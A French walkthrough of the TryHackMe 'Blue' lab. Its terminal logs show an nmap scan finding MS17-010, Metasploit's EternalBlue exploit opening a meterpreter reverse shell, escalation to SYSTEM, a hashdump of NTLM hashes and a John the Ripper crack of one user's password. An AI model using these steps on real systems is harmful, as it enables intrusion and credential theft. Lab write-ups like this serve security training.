# Blue

## ATTAQUE D’UNE MACHINE WINDOWS

Si vous êtes arrivé jusqu’à ce challenge, félicitations, mais surtout bon courage pour cette ultime room basée sur le fameux système d’exploitation de Microsoft.


- 👉 Commencez par l’introduction aux principaux composants et fonctionnalités de l’outil Metasploit : https://tryhackme.com/room/metasploitintro
    - Les mordules metasploit
        - Auxiliary
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/auxiliary/ 
        - Encoders
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/encoders/ 
        - Evasion
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/evasion/ 
        - Exploits
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/exploits/
        - NOPs
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/nops/
        - Payloads
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/payloads/
        - Post
            - tree -L 1 /opt/metasploit-framework/embedded/framework/modules/post/

- 👉 Une fois que vous maitrisez un peu plus l’outil Metasploit, attaquez-vous à une machine Windows en tirant parti des problèmes courants de mauvaise configuration : https://tryhackme.com/room/blue

- La cosole msfvenom
    - Il embarque tout un panel de commande
    - Ainsi que toute les fonctionalité de metasploit

N’hésitez pas à débloquer les aides et solutions ci-dessous si vous êtes bloqué lors d’une étape particulière 😉

```
root@ip-10-10-30-220:~# nmap -p-1000 -sV --script=vuln 10.10.57.179

Starting Nmap 7.60 ( https://nmap.org ) at 2023-04-05 16:05 BST
Nmap scan report for ip-10-10-57-179.eu-west-1.compute.internal (10.10.57.179)
Host is up (0.012s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
MAC Address: 02:69:05:E3:0E:9B (Unknown)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.73 seconds
```

```
root@ip-10-10-30-220:~# msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
m
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.57.179 
RHOSTS => 10.10.57.179
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.30.220:4444 
[*] 10.10.57.179:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.57.179:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.57.179:445      - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.57.179:445 - The target is vulnerable.
[*] 10.10.57.179:445 - Connecting to target for exploitation.
[+] 10.10.57.179:445 - Connection established for exploitation.
[+] 10.10.57.179:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.57.179:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.57.179:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.57.179:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.57.179:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.57.179:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.57.179:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.57.179:445 - Sending all but last fragment of exploit packet
[*] 10.10.57.179:445 - Starting non-paged pool grooming
[+] 10.10.57.179:445 - Sending SMBv2 buffers
[+] 10.10.57.179:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.57.179:445 - Sending final SMBv2 buffers.
[*] 10.10.57.179:445 - Sending last fragment of exploit packet!
[*] 10.10.57.179:445 - Receiving response from exploit packet
[+] 10.10.57.179:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.57.179:445 - Sending egg to corrupted connection.
[*] 10.10.57.179:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.10.57.179
[*] Meterpreter session 1 opened (10.10.30.220:4444 -> 10.10.57.179:49251) at 2023-04-05 17:04:26 +0100
[+] 10.10.57.179:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.57.179:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.57.179:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
Background session 1? [y/N]  y
[-] Unknown command: y
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter 
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.30.220:4433 
[*] Post module execution completed
[*] Sending stage (200774 bytes) to 10.10.57.179
[*] Meterpreter session 2 opened (10.10.30.220:4433 -> 10.10.57.179:49254) at 2023-04-05 17:06:10 +0100
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1860 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>exit
exit
meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

root@ip-10-10-30-220:~# john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22         (Jon)

meterpreter > search -f flag*.txt | cat
Found 3 results...
==================

Path                                  Size (bytes)  Modified (UTC)
----                                  ------------  --------------
c:\Users\Jon\Documents\flag3.txt      37            2019-03-17 19:26:36 +0000
c:\Windows\System32\config\flag2.txt  34            2019-03-17 19:32:48 +0000
c:\flag1.txt                          24            2019-03-17 19:27:21 +0000

```
